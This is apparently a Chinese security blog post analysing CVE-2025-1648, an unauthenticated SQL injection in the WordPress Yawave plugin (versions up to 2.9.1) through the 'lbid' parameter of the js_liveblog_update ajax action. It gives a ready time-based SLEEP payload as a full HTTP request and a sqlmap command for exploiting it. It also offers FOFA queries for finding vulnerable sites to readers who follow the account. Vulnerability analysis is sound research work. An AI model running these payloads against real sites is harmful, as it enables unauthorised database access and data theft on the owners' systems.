【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)

原创 Mstir 星悦安全 2025-02-27 11:12

点击上方
蓝字
关注我们 并设为
星标

0x00 前言

该漏洞影响 Yawave 版本 <=2.9.1

如果访问以下路径出现下图所示，说明存在未授权SQL注入漏洞

/wp-admin/admin-ajax.php?action=js_liveblog_update

0x01 漏洞分析&复现

漏洞点在 /includes/shortcode.liveblog.php 的 js_liveblog_update 方法，其通过GET传入 lbid参数，然后直接被带入到SQL查询字句中，导致漏洞产生.  

$get_liveblog_id = sanitize_text_field($_GET['lbid']);

而 js_liveblog_update 方法则被注册进了 wp_ajax 钩子中，所以直接使用 /wp-admin/admin-ajax.php?action=js_liveblog_update 即可调用该方法实施注入.

Payload:

GET /wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=(SELECT%205845%20FROM%20(SELECT(SLEEP(5)))FdfP)
Cache-Control: no-cache
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Sqlmap 语句：

python sqlmap.py -u "http://127.0.0.1/wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=*" --level=3 --dbms=mysql

0x02 FOFA语句

标签:代码审计，0day，渗透测试，系统，通用，0day，闲鱼，转转

FOFA语句关注公众号发送 250227 获取!

---

---

开了个星悦安全公开交流6群，🈲发公众号，纯粹研究技术，进了其他公开群的不要重复进了.

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，文章作者和本公众号不承担任何法律及连带责任，望周知！！!